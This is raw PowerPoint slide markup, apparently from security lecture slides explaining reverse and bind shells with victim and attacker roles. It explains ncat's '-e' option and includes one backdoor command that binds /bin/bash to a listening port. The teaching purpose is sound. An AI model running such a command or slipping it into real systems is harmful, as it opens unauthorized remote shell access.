          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9800404" y="4675773"/>
            <a:ext cx="1097577" cy="674832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Attacker </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for attac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4445" y="1514459"/>
            <a:ext cx="990052" cy="990052"/>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p:cNvCxnSpPr>
            <a:stCxn id="1026" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1561278" y="2009485"/>
            <a:ext cx="3353167" cy="1439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74914" y="1985521"/>
            <a:ext cx="3100220" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Let a victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a signal to activate the communication channel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7793921" y="1809876"/>
            <a:ext cx="3132976" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to a hidden communication channel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="53" name="Straight Arrow Connector 52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5939975" y="2009485"/>
            <a:ext cx="4112859" cy="1439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AF44B25-39B4-EDD2-4140-16B3F7C3CE8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1836292" y="4126517"/>
            <a:ext cx="7753680" cy="1369800"/>
            <a:chOff x="1836292" y="4126517"/>
            <a:chExt cx="7753680" cy="1369800"/>
          </a:xfrm>
        </p:grpSpPr>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BF9FB33B-E9EA-E8FB-D34D-41695C035B55}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1836292" y="4249637"/>
                <a:ext cx="7681680" cy="971280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="3" name="Ink 2">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF9FB33B-E9EA-E8FB-D34D-41695C035B55}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1818292" y="4231997"/>
                  <a:ext cx="7717320" cy="100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47A0012-B335-1771-B812-93AD13ED98B3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9307732" y="4126517"/>
                <a:ext cx="282240" cy="327960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="5" name="Ink 4">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{147A0012-B335-1771-B812-93AD13ED98B3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9289732" y="4108517"/>
                  <a:ext cx="31788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4579FA74-FCDA-31DA-502D-352D9E90BA49}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7619692" y="5353397"/>
                <a:ext cx="360" cy="102600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="6" name="Ink 5">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4579FA74-FCDA-31DA-502D-352D9E90BA49}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7601692" y="5335397"/>
                  <a:ext cx="36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3F5A0F89-9C55-CFE0-5C5F-FF2FF6652324}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7494772" y="5243597"/>
                <a:ext cx="437040" cy="252720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="7" name="Ink 6">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F5A0F89-9C55-CFE0-5C5F-FF2FF6652324}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId13"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7476772" y="5225597"/>
                  <a:ext cx="472680" cy="288360"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{527AD5DD-B295-2283-C83A-4CCA76091787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1685812" y="2961197"/>
            <a:ext cx="7528320" cy="735840"/>
            <a:chOff x="1685812" y="2961197"/>
            <a:chExt cx="7528320" cy="735840"/>
          </a:xfrm>
        </p:grpSpPr>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EBE43208-63F1-0F25-9853-8A3970CEA455}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1798132" y="2961197"/>
                <a:ext cx="7416000" cy="689040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="9" name="Ink 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBE43208-63F1-0F25-9853-8A3970CEA455}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId15"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1780492" y="2943197"/>
                  <a:ext cx="7451640" cy="724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DA560197-D065-9045-D9BD-8A5FDAC98D00}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1685812" y="3430637"/>
                <a:ext cx="260640" cy="266400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="10" name="Ink 9">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA560197-D065-9045-D9BD-8A5FDAC98D00}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId17"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1667812" y="3412997"/>
                  <a:ext cx="296280" cy="302040"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{334429DB-D5AE-4151-27CC-E1B608364EC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6009412" y="2414357"/>
            <a:ext cx="439560" cy="385200"/>
            <a:chOff x="6009412" y="2414357"/>
            <a:chExt cx="439560" cy="385200"/>
          </a:xfrm>
        </p:grpSpPr>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9990DE07-2B7F-B1C6-458F-62A54B9D7768}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6118852" y="2561957"/>
                <a:ext cx="175320" cy="185040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="12" name="Ink 11">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9990DE07-2B7F-B1C6-458F-62A54B9D7768}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId19"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6101212" y="2544317"/>
                  <a:ext cx="2109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28FF1866-BB77-C985-BA9D-746090F9E9FC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6009412" y="2414357"/>
                <a:ext cx="439560" cy="385200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="13" name="Ink 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FF1866-BB77-C985-BA9D-746090F9E9FC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId21"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5991412" y="2396357"/>
                  <a:ext cx="475200" cy="420840"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Right Arrow 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8730BDB-793B-1014-8282-8B952393E214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4237964" y="5994394"/>
            <a:ext cx="2631367" cy="1491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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CC032C4-89B7-DB99-ABC3-16D128B777F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4835276" y="5584025"/>
            <a:ext cx="1811009" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Reverse shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127055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80928" y="2045241"/>
            <a:ext cx="4166329" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: program to execute after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>connection occurs., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>connecting STDIN and STDOUT to the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: a shell command for Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6985048" y="5692495"/>
            <a:ext cx="4675064" cy="376966"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="36363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0" rIns="0" bIns="95220" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t> -l 10000 -e /bin/bash    //if create a backdoor in Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6880928" y="340707"/>
            <a:ext cx="2669320" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim sends signals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9131675" y="571540"/>
            <a:ext cx="418573" cy="39912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7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6985048" y="977022"/>
            <a:ext cx="3958088" cy="936221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34B348BD-A2F6-402E-B0EF-FD6D02594ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="75456" y="0"/>
            <a:ext cx="5244883" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05A84F03-3BE5-4BFF-9DA4-E19E32FD84AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3229658" y="977022"/>
            <a:ext cx="2024732" cy="543867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker listens port 8080 first</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E0BAF26-E70C-32CD-85C5-348CA092D882}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2202412" y="69317"/>
            <a:ext cx="322920" cy="321480"/>
            <a:chOff x="2202412" y="69317"/>
            <a:chExt cx="322920" cy="32148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806AB91-F5ED-D09C-5416-1C1790B0E281}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2344252" y="210437"/>
                <a:ext cx="23760" cy="155880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="3" name="Ink 2">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A806AB91-F5ED-D09C-5416-1C1790B0E281}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2326612" y="192797"/>
                  <a:ext cx="594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45D203D-AA7B-0F29-F1BC-67818FB7E702}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2202412" y="69317"/>
                <a:ext cx="322920" cy="321480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="4" name="Ink 3">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{745D203D-AA7B-0F29-F1BC-67818FB7E702}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
